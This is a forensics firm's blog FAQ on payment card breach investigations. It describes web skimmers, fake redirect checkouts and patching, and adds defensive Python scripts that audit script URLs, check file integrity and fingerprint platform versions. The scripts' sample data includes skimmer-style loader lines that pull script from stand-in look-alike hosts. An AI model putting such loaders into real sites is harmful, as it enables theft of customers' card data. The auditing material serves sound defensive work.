Everything you need to know about Payment Card Forensic Investigations (PFI)

15 July 2021

With changes to the industry and consumer behaviour in the wake of the Covid-19 pandemic, cardholder security is more important now than ever before. The upsurge in online shopping as High Street stores suffered crippling closures meant that cardholder data was being processed digitally at unprecedented levels. It looks like this trend is set to stay, with a survey undertaken by Waitrose revealing that 77 per cent of people now do at least some of their grocery shopping online, compared to 61 per cent a year ago.

The cyber team at IntaForensics have rounded up some of the most frequently asked questions related to PFI investigations, to ensure that you know how to best keep your eCommerce platform secure.

What is a PFI investigation?

The role of a PCI Forensic Investigator (PFI) is to establish whether a cardholder data compromise has occurred and to work out when and how it happened. PFIs play a vital role in the payment card industry: their investigations determine what data was exposed and drive the remediation needed to stop the same breach happening again.

What is the most common malware seen in PCI Forensic Investigations?

The current malware trend in PFI comes in the form of malicious URLs and skimming code. This malware is often stored as nothing more than a URL, and is usually 'hidden in plain sight'. The server delivers that reference to the customer's browser as part of the page, and it is the browser that then fetches and executes the code hosted at the external address.

The URL would usually be located within the database, the page header/footer or the payment page on your server. The malware could then be used to listen for and harvest user input, or to present the customer with a fake checkout to harvest data from; we have seen both in live PFI cases. Using these methods an attacker can easily steal your customers' card details, names and addresses.

It is common for these to be disguised as legitimate URLs by using domains spelt very similarly to legitimate ones, e.g. Google Analytics URLs. They are therefore difficult to spot, and they leave very little code on your own server to find. They are also ever-changing, which makes them difficult for anti-virus solution providers to keep on top of.

How to prevent Malicious URLs affecting your site:

Knowledge is power. Do you know which third-party scripts and URLs are in use on your server? Document them in a list and review it regularly. Then:

  • Implement a Web Application Firewall (WAF) to monitor for suspicious traffic.
  • Implement anti-virus solutions to identify known malicious domains.
  • Implement File Integrity Monitoring (FIM) on core files and payment pages, so that you or your developer are the only ones making changes.
  • Conduct regular reviews of core database tables to ensure nothing new has been added.
  • Conduct test transactions on your live website and confirm the checkout looks as it should.
Preparation is key and a loss of card data will inevitably be costly. Luckily, IntaForensics have conducted hundreds of investigations and are here to help.
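As an added example, not code from the original article: a small Python audit of the kind the first step above calls for. It pulls every external script reference out of page templates and stored database values (a script src attribute, a URL inside an inline script, or a bare URL sitting in a config row), compares the host against a documented allowlist, and flags hosts that are a couple of characters off a known one or that embed a known host inside another domain. The allowlist, the template paths, the core_config_data row and the lookalike domains are constructed for the example.

```python
import re
from urllib.parse import urlparse

# Documented allowlist of third-party script hosts the site is known to use.
# Assumed for this example; build the real one from your own audit.
ALLOWED_HOSTS = {
    "www.google-analytics.com",
    "js.stripe.com",
    "cdn.jsdelivr.net",
}

# The three places a script reference hides: a <script src=...> attribute, a URL
# inside an inline <script> body, and a bare URL stored in a database/config row.
SCRIPT_SRC_RE = re.compile(r"<script[^>]+src\s*=\s*['\"]([^'\"]+)['\"]", re.I)
INLINE_SCRIPT_RE = re.compile(r"<script[^>]*>(.*?)</script>", re.I | re.S)
ABS_URL_RE = re.compile(r"https?://[^\s'\"<>)]+", re.I)
PROTO_REL_RE = re.compile(r"(?<![:\w/])(//[a-z0-9.-]+\.[a-z]{2,}[^\s'\"<>)]*)", re.I)


def _normalise(url: str):
    """Turn protocol-relative references into absolute ones; drop same-site paths."""
    url = url.strip()
    if url.startswith("//"):
        return "https:" + url
    if url.lower().startswith(("http://", "https://")):
        return url
    return None  # relative path served from this site: out of scope for this audit


def extract_script_urls(text: str) -> list:
    """External script URLs referenced by a template fragment or a stored DB value."""
    raw = SCRIPT_SRC_RE.findall(text)
    bodies = INLINE_SCRIPT_RE.findall(text)
    for body in (bodies or [text]):  # no <script> tag at all: the value itself may be the URL
        raw += ABS_URL_RE.findall(body) + PROTO_REL_RE.findall(body)
    urls = []
    for r in raw:
        u = _normalise(r)
        if u and u not in urls:
            urls.append(u)
    return urls


def levenshtein(a: str, b: str) -> int:
    """Edit distance, used to catch hosts one or two characters off a known one."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def classify_host(host: str) -> str:
    host = host.lower()
    if host in ALLOWED_HOSTS:
        return "allowed"
    for known in sorted(ALLOWED_HOSTS):
        # Typosquat a couple of edits away (google-analytlcs.com), or a known host
        # used as a label inside someone else's domain (google-analytics.com.evil.example).
        if levenshtein(host, known) <= 2 or known in host:
            return f"lookalike of {known}"
    return "unknown"


def audit(sources: dict) -> list:
    """sources maps a location (template path or DB table:config path) to its text.
    Returns (location, url, verdict) for every external script reference found."""
    findings = []
    for location, text in sources.items():
        for url in extract_script_urls(text):
            host = urlparse(url).hostname or ""
            findings.append((location, url, classify_host(host)))
    return findings


def suspicious(findings: list) -> list:
    return [f for f in findings if f[2] != "allowed"]


# Constructed sample, not taken from a real case: a footer template carrying a
# typosquatted analytics tag, a Magento core_config_data row that loads a script
# from an undocumented host, and a clean checkout template.
SAMPLE_SOURCES = {
    "app/design/page/footer.phtml": (
        '<script src="https://www.google-analytics.com/analytics.js"></script>\n'
        '<script src="https://www.google-analytlcs.com/analytics.js"></script>\n'
    ),
    "core_config_data:design/footer/absolute_footer": (
        "<script>var s=document.createElement('script');"
        "s.src='//cdn-stats.example/ga.js';document.head.appendChild(s);</script>"
    ),
    "app/design/checkout/onepage.phtml": (
        '<script src="https://js.stripe.com/v3/"></script>'
    ),
}

if __name__ == "__main__":
    for location, url, verdict in audit(SAMPLE_SOURCES):
        print(f"{verdict:40} {url}  ({location})")
```

Run it over exported templates and a dump of the configuration tables rather than over the live site, so that the audit also catches references that are only injected for certain pages or customers. Anything that comes back as "unknown" or "lookalike" is either missing from your documented list or is the kind of URL the investigations above describe.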

Are fully hosted checkouts as safe as they seem?

Fully hosted checkouts (iFrame and redirect solutions) are the recommended checkouts to use. The code for these checkouts is hosted by a third party rather than on your server, which reduces the risk of a breach of your server exposing customer card data. Back in the day, it was very common for attackers to modify payment pages and send card data to email addresses or external addresses. Fully hosted checkouts prevented this type of attack.

However, just like all areas of technology, attacker methods have evolved. Attackers realised they could not modify these checkouts anymore and looked to other avenues. They discovered they could add skimming code to the merchant’s server, in order to listen and harvest user input from iFrame solutions.

Similar to a key logger, malicious code or URLs are added to core database tables or page footers/headers to listen for input and exfiltrate it. This code runs in the customer's browser, so it is still able to see the card data being entered. Note that the browser's same-origin policy prevents a script on the merchant's page from reading fields inside the gateway's cross-origin iFrame directly, so in practice the injected code substitutes or overlays the frame with a look-alike form of its own; this is why a test transaction that checks the checkout looks as it should is worth doing.

Because a redirect checkout sends the customer to an entirely different website, attackers cannot skim from the checkout page itself. They discovered, however, that the pointer to that checkout must be stored on your server, and that by altering it they can insert their own checkout into the process, ahead of the legitimate one. This fake checkout is presented to the customer as the real thing and captures everything entered into it. The method usually means the customer is shown two checkouts in succession; we have seen attackers add fake error messages to their checkout to explain this away and avoid it being noticed. This malware too takes the form of a hidden malicious URL or a small script.

How to prevent your checkout being breached:

Fully hosted checkouts alone are not enough. You may no longer be processing card details directly, but the card flow on your site can still be tampered with. You must implement security measures to protect the entire card flow and follow the same steps outlined above to combat malicious URLs.
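As an added example, not from the original article: a minimal file integrity and configuration check in Python covering the two attacks just described. It records a go-live baseline of the checkout and footer templates (where iFrame skimmers are injected) and of the configuration value that points at the redirect checkout (the pointer a fake checkout is wedged in front of), then reports anything that later differs. The template paths and configuration keys are assumed for the example, and the attacker activity it replays is constructed.

```python
import hashlib
import tempfile
from pathlib import Path

# Files an attacker must touch to skim an iFrame checkout. Paths are assumed.
WATCHED_FILES = ["app/design/checkout/onepage.phtml", "app/design/page/footer.phtml"]

# Configuration values that steer the card flow: the redirect pointer and the
# stored footer HTML. Keys are assumed for the example.
WATCHED_CONFIG = ["payment/gateway/redirect_url", "design/footer/absolute_footer"]


def sha256_bytes(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def build_baseline(root: Path, config: dict) -> dict:
    """Hashes of watched files and values of watched config at a known-good moment."""
    files = {rel: sha256_bytes((root / rel).read_bytes()) for rel in WATCHED_FILES}
    cfg = {key: config.get(key) for key in WATCHED_CONFIG}
    return {"files": files, "config": cfg}


def check_integrity(root: Path, config: dict, baseline: dict) -> list:
    """(item, status) for every watched file or config entry that differs from baseline."""
    findings = []
    for rel, known in baseline["files"].items():
        path = root / rel
        if not path.exists():
            findings.append((rel, "missing"))
        elif sha256_bytes(path.read_bytes()) != known:
            findings.append((rel, "modified"))
    for key, known in baseline["config"].items():
        if config.get(key) != known:
            findings.append((key, f"changed: {known!r} -> {config.get(key)!r}"))
    return findings


def demo() -> list:
    """Constructed scenario: take a baseline at go-live, then replay an attacker who
    appends a skimmer loader to the checkout template and repoints the redirect URL
    at a look-alike host. Returns the integrity findings."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        originals = {
            WATCHED_FILES[0]: "<form id='checkout'><iframe src='https://pay.gateway.example'></iframe></form>\n",
            WATCHED_FILES[1]: "<footer>&copy; Example Shop</footer>\n",
        }
        for rel, body in originals.items():
            (root / rel).parent.mkdir(parents=True, exist_ok=True)
            (root / rel).write_text(body)
        config = {
            "payment/gateway/redirect_url": "https://pay.gateway.example/redirect",
            "design/footer/absolute_footer": "",
        }
        baseline = build_baseline(root, config)

        # Attacker activity (constructed for the example).
        with (root / WATCHED_FILES[0]).open("a") as fh:
            fh.write("<script src='https://pay-gateway.example/ga.js'></script>\n")
        config["payment/gateway/redirect_url"] = "https://pay-gateway.example/redirect"

        return check_integrity(root, config, baseline)


if __name__ == "__main__":
    for item, status in demo():
        print(f"{status:50} {item}")
```

Keep the baseline somewhere the web server cannot write to (a separate host or a read-only store); an attacker who can edit the checkout template can equally well update a baseline that lives beside it. The same comparison applies to any other table or setting your platform uses to locate the gateway.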

What do I do if an incident occurs on my website?

If a customer calls and says their card has been stolen from your website, would you know what to do? Or perhaps you find malware on your web server, what would you do?

Upon identification of a breach within your ecommerce environment, you will need to alert your acquiring bank. With card data potentially at risk from an attacker, your bank will ask you to commission a PFI investigation to find out what has happened. If you wish to remediate your website environment before the investigator arrives, make sure you document every change made and keep copies of any malicious code (before removal) to provide to the PFI for analysis. Preserve web server, database and access logs as well, and do not wipe or rebuild the server before the investigator has taken an image of it: doing so destroys the evidence needed to establish when and how the compromise happened.

Following engagement, the PFI can conduct their analysis and assist in any further remediation required. IntaForensics have conducted hundreds of these investigations and this is a process we will be able to guide you through from end-to-end. We are here to help and support.

How important is it to patch your platform and make sure it’s up-to-date?

Regular platform patching is an essential part of website maintenance. Patching addresses bugs and glitches, but most importantly addresses security holes.

As mandated under PCI DSS (Requirement 6.2), critical security patches should be applied within one month of release. Some platforms are well known for being breached as a result of out-of-date applications, where known vulnerabilities were exploited because the merchant had not addressed them. For example, many e-commerce merchants are still using Magento 1, which went out of support in June 2020 and is considered a high-risk platform.

You must ensure any plugins and add-ons in use are up to date. Some platforms, including WordPress, are very easy to update, whereas others may need a little more time.

  • Do you know what e-commerce platform is in use on your website?
  • Is your e-commerce platform up to date?
  • Are you still using Magento 1?

Maintaining your patching/versions is something which can easily be managed by checking the official websites on a regular basis. We suggest doing this at least once a month, in addition to making sure any missing patches have been applied and the latest version is in use. There are several open-source tools which can also assist with this.
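An added example (not from the original article) that answers the three questions above in code. It fingerprints the platform and version from the files each platform really uses to record them (app/Mage.php for Magento 1, composer.json for Magento 2, wp-includes/version.php for WordPress, index.php for OpenCart), flags Magento 1 as end of life, and compares everything else against a table of current releases. The sample webroots and the version numbers in the LATEST table are constructed placeholders; the table is the thing you refresh from the vendors' sites at each monthly check.

```python
import json
import re
import tempfile
from pathlib import Path

# Patterns for the version markers in each platform's own files.
MAGE1_RE = re.compile(r"'(major|minor|revision|patch)'\s*=>\s*'(\d+)'")
WP_RE = re.compile(r"\$wp_version\s*=\s*'([^']+)'")
OPENCART_RE = re.compile(r"define\(\s*'VERSION'\s*,\s*'([^']+)'\s*\)")

# Current release per platform, as recorded by the merchant at the monthly check.
# Placeholder numbers for the example, not the vendors' current values.
LATEST = {"Magento 2": "2.4.2", "WordPress": "5.7.2", "OpenCart": "3.0.3.8"}
END_OF_LIFE = {"Magento 1"}  # unsupported since June 2020


def detect_platform(root: Path):
    """Return (platform, version) for a webroot, or (None, None) if nothing matches.
    Order matters: Magento 1 and WordPress also ship an index.php."""
    mage1 = root / "app" / "Mage.php"
    if mage1.exists():
        parts = dict(MAGE1_RE.findall(mage1.read_text()))
        version = ".".join(parts.get(k, "0") for k in ("major", "minor", "revision", "patch"))
        return "Magento 1", version
    composer = root / "composer.json"
    if composer.exists():
        data = json.loads(composer.read_text())
        if str(data.get("name", "")).startswith("magento/"):
            return "Magento 2", str(data.get("version", "unknown"))
    wp = root / "wp-includes" / "version.php"
    if wp.exists():
        m = WP_RE.search(wp.read_text())
        return "WordPress", m.group(1) if m else "unknown"
    oc = root / "index.php"
    if oc.exists():
        m = OPENCART_RE.search(oc.read_text())
        if m:
            return "OpenCart", m.group(1)
    return None, None


def version_tuple(v: str) -> tuple:
    """Numeric components only, so '3.0.3.8' compares correctly against '3.0.3.10'."""
    return tuple(int(x) for x in re.findall(r"\d+", v))


def assess(platform, version) -> str:
    if platform is None:
        return "unknown platform: identify it before anything else"
    if platform in END_OF_LIFE:
        return f"{platform} {version}: end of life, migrate"
    latest = LATEST.get(platform)
    if latest is None:
        return f"{platform} {version}: no reference version recorded"
    if version_tuple(version) < version_tuple(latest):
        return f"{platform} {version}: behind current release {latest}, patch"
    return f"{platform} {version}: current"


def demo() -> dict:
    """Constructed sample webroots (a Magento 1 shop, a WordPress shop one patch
    behind, and a current OpenCart shop). Returns {name: assessment}."""
    samples = {
        "shop-a": {"app/Mage.php": "return array('major' => '1', 'minor' => '9', "
                                   "'revision' => '4', 'patch' => '5');"},
        "shop-b": {"wp-includes/version.php": "<?php\n$wp_version = '5.7.1';\n"},
        "shop-c": {"index.php": "<?php\ndefine('VERSION', '3.0.3.8');\n"},
    }
    results = {}
    with tempfile.TemporaryDirectory() as tmp:
        for name, files in samples.items():
            root = Path(tmp) / name
            for rel, body in files.items():
                (root / rel).parent.mkdir(parents=True, exist_ok=True)
                (root / rel).write_text(body)
            results[name] = assess(*detect_platform(root))
    return results


if __name__ == "__main__":
    for name, verdict in demo().items():
        print(f"{name}: {verdict}")
```

Point detect_platform at each webroot you are responsible for, including staging copies and any second store a third party set up for you, and keep the LATEST table in the same place as your patching log so the two are reviewed together.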

Another important point is making sure that your staff and third parties know who is responsible for this. A little knowledge on your side helps you check that your third parties are doing what you pay them for, and reduces the risk to your customers' data.

What e-commerce platforms are most secure?

We see various e-commerce platforms in our PFI investigations, including Magento, WordPress, OpenCart and bespoke platforms. These are the platforms your website is built upon, and they are what is publicly exposed on the internet.
The below shows which platforms we have seen in breached e-commerce environments this quarter:

[Graph: e-commerce platforms seen in breached environments this quarter]

IntaForensics provides a comprehensive range of cyber security services designed to prevent, monitor, and respond to security breaches.

We boast a team of 50 cyber security and digital forensic experts and a growing market presence. Our consultants will be able to assist with all digital forensic investigations, PCI DSS QSA and PFI engagements, cyber security and incident response.

Quality underpins everything we do, and we are proud to be ISO/IEC 17025:2017 accredited by UKAS and ISO/IEC 27001:2013, ISO 9001:2015 and ISO 14001:2015 certified.
